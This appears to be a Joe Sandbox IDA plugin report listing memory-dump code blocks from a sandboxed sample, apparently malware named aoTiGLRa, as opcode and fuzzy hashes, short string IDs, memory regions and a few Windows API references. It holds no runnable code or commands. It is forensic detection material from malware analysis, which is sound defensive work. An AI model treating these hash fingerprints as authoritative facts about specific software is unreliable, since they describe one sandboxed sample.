                                                                                                                            • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                                            • API String ID: 0-2212926057
                                                                                                                            • Opcode ID: 46fe35af65e9dd7828cfd2317eec88226143d3104dcd894830e9e530f3f09dcd
                                                                                                                            • Instruction ID: c3302f27641b444b7ff373f2eaf0cacc6f764a2f6a44929db409f3933861a858
                                                                                                                            • Opcode Fuzzy Hash: 46fe35af65e9dd7828cfd2317eec88226143d3104dcd894830e9e530f3f09dcd
                                                                                                                            • Instruction Fuzzy Hash: 3C126A34A1020A9FCB24CF68D985AAEBBF6FF48314F588599E855DB361D730ED81CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Hq$Hq
                                                                                                                            • API String ID: 0-925789375
                                                                                                                            • Opcode ID: 54688a9bbdb884ac718aa6283e2f0a8897dff9e005eb2b84e708dced27aecc17
                                                                                                                            • Instruction ID: c04a1961f6820f89340c6383c0f5eefe3415fbceece591f944d731b2f7038560
                                                                                                                            • Opcode Fuzzy Hash: 54688a9bbdb884ac718aa6283e2f0a8897dff9e005eb2b84e708dced27aecc17
                                                                                                                            • Instruction Fuzzy Hash: 3391DC343242118FDB169F24D856B6E7BA6BF89305F588469E846CB391CF34DC82C791
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,q$,q
                                                                                                                            • API String ID: 0-1667412543
                                                                                                                            • Opcode ID: 75bd3882797e57b51b9f5cf8eae99d2ad83c07931a594800c67890b3df484c74
                                                                                                                            • Instruction ID: c4476bd1b7dfb4b7dede20a36d5578d74bdadd6185e309b16f4f54a64a4cea6a
                                                                                                                            • Opcode Fuzzy Hash: 75bd3882797e57b51b9f5cf8eae99d2ad83c07931a594800c67890b3df484c74
                                                                                                                            • Instruction Fuzzy Hash: AD81C134B30506CFCB14CF69C485AA9BBB6FF99310B998069D415DB364CB35E881CB60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (&q$(q
                                                                                                                            • API String ID: 0-2464455664
                                                                                                                            • Opcode ID: 69e077828124cd9bc8e192cb8bed8130947873f0ed1d07aaa2e22b2c68f54714
                                                                                                                            • Instruction ID: 044c8da560f7d89eee72bff5e69f0c604ef3cd9c35bed62fb72decd6ef353d48
                                                                                                                            • Opcode Fuzzy Hash: 69e077828124cd9bc8e192cb8bed8130947873f0ed1d07aaa2e22b2c68f54714
                                                                                                                            • Instruction Fuzzy Hash: DA718D31F003198BDB15DFA9D8506AEBBB2BFC9350F54812AE805AB390DF349D46CB91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'q$4'q
                                                                                                                            • API String ID: 0-1467158625
                                                                                                                            • Opcode ID: f873d18325a4cb7190f732095eb22fa013909295d5b8f62bed2a3f59ad424216
                                                                                                                            • Instruction ID: 13fb82f59d9e0e4a8cdaba8a5dcc8bfaed4c65b3bbcda31dd753cb76954bc807
                                                                                                                            • Opcode Fuzzy Hash: f873d18325a4cb7190f732095eb22fa013909295d5b8f62bed2a3f59ad424216
                                                                                                                            • Instruction Fuzzy Hash: 0251B2707203159FDB00EBA9C845B6EBBEAEB88311F488466E948CB355DB75DC81C7A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$(oq
                                                                                                                            • API String ID: 0-1396055846
                                                                                                                            • Opcode ID: f672a927f2fbbec65536dd48c4137cf6f57d5dec2f89aabfcfe06e1ff3e3017c
                                                                                                                            • Instruction ID: 58acabfcb952ce8f7173b54b9b38e8c2da61e897acdf5671421df03a9873ca7a
                                                                                                                            • Opcode Fuzzy Hash: f672a927f2fbbec65536dd48c4137cf6f57d5dec2f89aabfcfe06e1ff3e3017c
                                                                                                                            • Instruction Fuzzy Hash: 86311331B242059FC704DB78E81676EBBF6EFC9211F584069E906DB390DE31EC418791
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Xq$Xq
                                                                                                                            • API String ID: 0-1556399337
                                                                                                                            • Opcode ID: e287c22dc32aa5043686bda26545bd176d4e1fab84d53fe5608326e4addac15e
                                                                                                                            • Instruction ID: 1b04663f54ffc8533a3e02fa1ac911cd8191a2a339508b6e1ae0a74f2756c193
                                                                                                                            • Opcode Fuzzy Hash: e287c22dc32aa5043686bda26545bd176d4e1fab84d53fe5608326e4addac15e
                                                                                                                            • Instruction Fuzzy Hash: 6731CB39B2032547DF28C6BA589637EA5EAEBC4352F5C4079EA07C7380DFB4CC858691
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $q$$q
                                                                                                                            • API String ID: 0-3126353813
                                                                                                                            • Opcode ID: cc7b30cf04353ae570764f8094759f6b1a4420660a3356be70ba7f0b876c9640
                                                                                                                            • Instruction ID: 0ccfa359b5ecb58cbccd54b409e5ef21810e7824ffef21b720c9e36b9dcb8abc
                                                                                                                            • Opcode Fuzzy Hash: cc7b30cf04353ae570764f8094759f6b1a4420660a3356be70ba7f0b876c9640
                                                                                                                            • Instruction Fuzzy Hash: 6D31A6303342124FDB25CB69C85663EB76BFB84A10BE8449AF496DB392DE74DCC08755
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LRq
                                                                                                                            • API String ID: 0-3187445251
                                                                                                                            • Opcode ID: 879d6305f48a36dc17fd90ba7ffe420e142cdddfea5a640a692ed38cc9904f5f
                                                                                                                            • Instruction ID: 518266516f3852fa52c5589df6f404172d18e5894fd85652c83d765841adb404
                                                                                                                            • Opcode Fuzzy Hash: 879d6305f48a36dc17fd90ba7ffe420e142cdddfea5a640a692ed38cc9904f5f
                                                                                                                            • Instruction Fuzzy Hash: B352C778A00219CFDB64DF64E984AEDBBB5FB88301F1091A5E809A7354DF746E85CF81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LRq
                                                                                                                            • API String ID: 0-3187445251
                                                                                                                            • Opcode ID: 559251f36e232c1846a16031ac82b072a29c245501d0b881eb3e3cb9ae224f9f
                                                                                                                            • Instruction ID: 7acdcc7fb8d7d7ea43eae622a3434f924443b5f8066ffb432137704fe20fb864
                                                                                                                            • Opcode Fuzzy Hash: 559251f36e232c1846a16031ac82b072a29c245501d0b881eb3e3cb9ae224f9f
                                                                                                                            • Instruction Fuzzy Hash: 3952B778A00219CFDB64DF64E984AEDBBB5FB88301F1091A5E809A7354DF746E85CF41
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0166CB6E,?,?,?,?,?), ref: 0166CC2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3698413216.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_1660000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 3e7a80cee86fae17a23aa3872820ee24ac4aac0de85f1a9efebefac17ed390d9
                                                                                                                            • Instruction ID: 4814c02007fe225653b6c2db7a1eb90055f526c1b39484f4c237e4c07e6c06eb
                                                                                                                            • Opcode Fuzzy Hash: 3e7a80cee86fae17a23aa3872820ee24ac4aac0de85f1a9efebefac17ed390d9
                                                                                                                            • Instruction Fuzzy Hash: 1B21E5B5D00248EFDB10CF9AD984ADEBBF8EB48310F14841AE958A7350D379A940CFA5
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0166CB6E,?,?,?,?,?), ref: 0166CC2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3698413216.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_1660000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: dcc63fb8855d11d8d0ec19fb503bfc69834d6a4506690e492354375b899f9ce1
                                                                                                                            • Instruction ID: 54b1b290be53c148a9ff6c30876705868ae3e9c7e0a28a624b446ff68544de9c
                                                                                                                            • Opcode Fuzzy Hash: dcc63fb8855d11d8d0ec19fb503bfc69834d6a4506690e492354375b899f9ce1
                                                                                                                            • Instruction Fuzzy Hash: 6B21E3B5D00248AFDB10CFAAD984ADEBBF8EB48310F14841AE958A7350D378A940CF65
                                                                                                                            APIs
                                                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 01489A6E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3697565710.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_1480000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: c2dd4fe50d3fc24ac98230c61b434ada5198743fdd667ff6bb1eec5f44389e84
                                                                                                                            • Instruction ID: a69d16ed0846578e3a2be7ce6d2fab4de35a8573784b76933446f098d856b102
                                                                                                                            • Opcode Fuzzy Hash: c2dd4fe50d3fc24ac98230c61b434ada5198743fdd667ff6bb1eec5f44389e84
                                                                                                                            • Instruction Fuzzy Hash: 6D117C74E0020A9FDB04EFA9D984ABDFBB9FFD8318F148166E804A7256D770A941CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6902a4ba65f60a13f50c2f3b75be4923b2778c596ba1e6ccfaf60932a4d92d52
                                                                                                                            • Instruction ID: 817725343ee1c77af49454443607692e9536e1ae04e8a350b6fcfd15dba71ab5
                                                                                                                            • Opcode Fuzzy Hash: 6902a4ba65f60a13f50c2f3b75be4923b2778c596ba1e6ccfaf60932a4d92d52
                                                                                                                            • Instruction Fuzzy Hash: C11297380352468FE7512B24F2AE12B7F69FB1F3637047C41FA4A88559AF71A449CF22
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e2cdaa0efb893b00b70b3be40277498a3f5d4daa9405ab8508e6bea59cc69b63
                                                                                                                            • Instruction ID: 88c2b55a6ee6f88470475665f08f57170c47689138c119740b0b088353d55c70
                                                                                                                            • Opcode Fuzzy Hash: e2cdaa0efb893b00b70b3be40277498a3f5d4daa9405ab8508e6bea59cc69b63
                                                                                                                            • Instruction Fuzzy Hash: 4A1287380312478FA7512B24F2AE52B7F69FB1F3637047C41FA5A88559AF71A449CF22
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4c25eb6bbc2d920c028fbe4f923df974eca461b29108bc214ddb347e3ea7e285
                                                                                                                            • Instruction ID: bec7dc2aa3c09d5436f5a2d3042ad79f2acb211475a7dba8df0e8223f5038b08
                                                                                                                            • Opcode Fuzzy Hash: 4c25eb6bbc2d920c028fbe4f923df974eca461b29108bc214ddb347e3ea7e285
                                                                                                                            • Instruction Fuzzy Hash: F6C1CF70A002299FEBA4DF68C954BDDBBB2BB98300F1081EAD90DA7250DB715E85CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e24caea3144ce7b72eb8545a496785c23fd49cfd6d7617e58f35ef4c1ca4f9b4
                                                                                                                            • Instruction ID: 467c3de743bd4783e9a721879351017346f94cea3b23ccf33bfd54dd0cf60a55
                                                                                                                            • Opcode Fuzzy Hash: e24caea3144ce7b72eb8545a496785c23fd49cfd6d7617e58f35ef4c1ca4f9b4
                                                                                                                            • Instruction Fuzzy Hash: 95B1B074E0022A9FEB64DF69C954BDDBBB2BB88300F1081EAD90DA7250DB745E84CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a2b432041f97ca6aaefa7987a8c23c6a883a75857bfa885b1f8c7f6e1d2c719c
                                                                                                                            • Instruction ID: 918918b7c61ef13f38efce1479ad69673d042a24edeb3b64697f2eec0a45d86d
                                                                                                                            • Opcode Fuzzy Hash: a2b432041f97ca6aaefa7987a8c23c6a883a75857bfa885b1f8c7f6e1d2c719c
                                                                                                                            • Instruction Fuzzy Hash: 878116319106069FC711CF2CC8856AAFBBAEF85324B58C26BD8589B351D735F8D1CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0ac8063cfb8e01e53df2af0c06f0cdf6f12d60ae9ef4732952157d40b9e6105c
                                                                                                                            • Instruction ID: 524f491e9c86a111a8a64160b81360135b3d05f2ed437a189fb281ad3c2a8302
                                                                                                                            • Opcode Fuzzy Hash: 0ac8063cfb8e01e53df2af0c06f0cdf6f12d60ae9ef4732952157d40b9e6105c
                                                                                                                            • Instruction Fuzzy Hash: BA716D347206468FCB14DF68C895A6E7BE5BF8AA05F5900A9E845DB3B0DB70DC81CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b2c3ace47a67f74b14ac0ec3da5803c60deeb25fc1273518a77da2af143ac23f
                                                                                                                            • Instruction ID: 304e29d3b9d55979323effb3942849eb947f18d1e000b9f7ecf1ce359172c00f
                                                                                                                            • Opcode Fuzzy Hash: b2c3ace47a67f74b14ac0ec3da5803c60deeb25fc1273518a77da2af143ac23f
                                                                                                                            • Instruction Fuzzy Hash: AA611374E402199FEB04DFE9D944B9DBBF6BF98310F54C029E848AB369EA309941CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cbf7e7fab6497f7709358ff503eee1281db44efa4aad7b9a17a78ec6b3812f4c
                                                                                                                            • Instruction ID: 7fc64089505b144103e6c84aef77cfdbd579eb92c49670c1991298ef3a430d0a
                                                                                                                            • Opcode Fuzzy Hash: cbf7e7fab6497f7709358ff503eee1281db44efa4aad7b9a17a78ec6b3812f4c
                                                                                                                            • Instruction Fuzzy Hash: 48610474E402199FDB04DFA9D944B9DBBF6BF98300F54C029E848AB359DA309941CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6cf0edd50b61d028339691116e3c3349a0baaf7f1aab52cc4e1e9aa31b6ef9b7
                                                                                                                            • Instruction ID: 354736ca881e75709f66e5444068fb1117fd4f86505df474ded0ea35126a61e6
                                                                                                                            • Opcode Fuzzy Hash: 6cf0edd50b61d028339691116e3c3349a0baaf7f1aab52cc4e1e9aa31b6ef9b7
                                                                                                                            • Instruction Fuzzy Hash: 5551F174D01318DFDB24DFA9D954BAEBBB2FF89300F208529E805AB255DB355A86CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 98d426ca554bfec39253b17117d8bff4770e1b9614dd67b7a337c717932401e9
                                                                                                                            • Instruction ID: e0c8e5a7ee7b9931c132ac0ec49d0819bd8ebd2fb7b362cfd78baff9de2eaa94
                                                                                                                            • Opcode Fuzzy Hash: 98d426ca554bfec39253b17117d8bff4770e1b9614dd67b7a337c717932401e9
                                                                                                                            • Instruction Fuzzy Hash: 1751B074E002199FDB44DFA9D595AEEBBF2FF88300F24842AD905AB354DB346A45CF90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6afa3086932ba442c205e95adeb43d0104e93091ca273f263262161ce29f5843
                                                                                                                            • Instruction ID: 3de7f779571b1a15f5c54a80d372e8d7b540972a6d5e6d73dd1563894d0b3913
                                                                                                                            • Opcode Fuzzy Hash: 6afa3086932ba442c205e95adeb43d0104e93091ca273f263262161ce29f5843
                                                                                                                            • Instruction Fuzzy Hash: 3C519374E01208DFDB54DFA9D98499DBBF2FF89300F248169E819AB365DB30A941CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e76f438741dff2a3c0e07d2bcc6ade814f9b0e1b130a4f24426562f891e68a2a
                                                                                                                            • Instruction ID: e56a01f859ef694726dc31d6fe41f9f2f63afa42dec59bf8bbf174d70dcaeca3
                                                                                                                            • Opcode Fuzzy Hash: e76f438741dff2a3c0e07d2bcc6ade814f9b0e1b130a4f24426562f891e68a2a
                                                                                                                            • Instruction Fuzzy Hash: F1517278E01308CFDB08DFA9D59499DBBB6FF8D310B609069E815AB364DB35A942CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6cd6d0df317ee29a095aa04688680ce50d1b49ea132f696e60be6b053da239a2
                                                                                                                            • Instruction ID: 77de59738c397cf599f144b4727bec43facda46b34ca59ad9e60650f4a4b5092
                                                                                                                            • Opcode Fuzzy Hash: 6cd6d0df317ee29a095aa04688680ce50d1b49ea132f696e60be6b053da239a2
                                                                                                                            • Instruction Fuzzy Hash: 00415131E403199BDB14DFA9C890BEEBBF1BF98710F14812AE505BB244EB70AD45CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 70f137d7095560684dec9ef416addf94aad318340409c6882fcc2d9335a7677d
                                                                                                                            • Instruction ID: 4219ae38a960d9cd4f37d560a62662c210c9b88c9da8e6593d1f67909328b4a1
                                                                                                                            • Opcode Fuzzy Hash: 70f137d7095560684dec9ef416addf94aad318340409c6882fcc2d9335a7677d
                                                                                                                            • Instruction Fuzzy Hash: FE41C232A10249DFDF11CFA8C846B9DBFB6FF89310F488056E945AB291D374E994CB60
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e20641f4bf20ce08ff875a31b5f32f31cd104e3e0372e01c156fcb077c2b1a40
                                                                                                                            • Instruction ID: 9465b64601075730054a50bd855ea6ee2cf4008f78d12d255efa01732388caca
                                                                                                                            • Opcode Fuzzy Hash: e20641f4bf20ce08ff875a31b5f32f31cd104e3e0372e01c156fcb077c2b1a40
                                                                                                                            • Instruction Fuzzy Hash: 9741C174E00208DFDB14CFA9D5457EDBBF2FB88301F18906AD815A7294EB786946CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bea6f7f0939cad8338b0b5335af604b6b9fde355e3d658812d36ed6abaf929ce
                                                                                                                            • Instruction ID: 18584e6f168089831ee06c4c899442171c78139d872d4f5ccb2fbd5a21550682
                                                                                                                            • Opcode Fuzzy Hash: bea6f7f0939cad8338b0b5335af604b6b9fde355e3d658812d36ed6abaf929ce
                                                                                                                            • Instruction Fuzzy Hash: 0241E630A142499FDB11CF68C815BBFBBB6EB44305F4880AAE815DB251DB75DD84CFA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6c5f1d831fa3529840aa4fca935f4ca2f99dae75c1921bd68f50707afb40b84f
                                                                                                                            • Instruction ID: e7c1fc7cffd042598e588723b1cd00f5c956996b17b212ea7b712444a8692970
                                                                                                                            • Opcode Fuzzy Hash: 6c5f1d831fa3529840aa4fca935f4ca2f99dae75c1921bd68f50707afb40b84f
                                                                                                                            • Instruction Fuzzy Hash: CC31AC3562020ADFCF029F64D895AAE7FB6EB99305F544024FD09C7240CB39DE61DBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a561b35970d6cb20c2bf337b12987a4e2b32f36f23e8498b94a0dccac58c8286
                                                                                                                            • Instruction ID: cddd747db442b23534ed8f2d518bfea508b850e91a9815623ed0c2b304878598
                                                                                                                            • Opcode Fuzzy Hash: a561b35970d6cb20c2bf337b12987a4e2b32f36f23e8498b94a0dccac58c8286
                                                                                                                            • Instruction Fuzzy Hash: 8D21FC3232020147DB15977A845673E769BEFC4B49F988079E886CB798EE76CCC2D341
                                                                                                                            Memory Dump Source
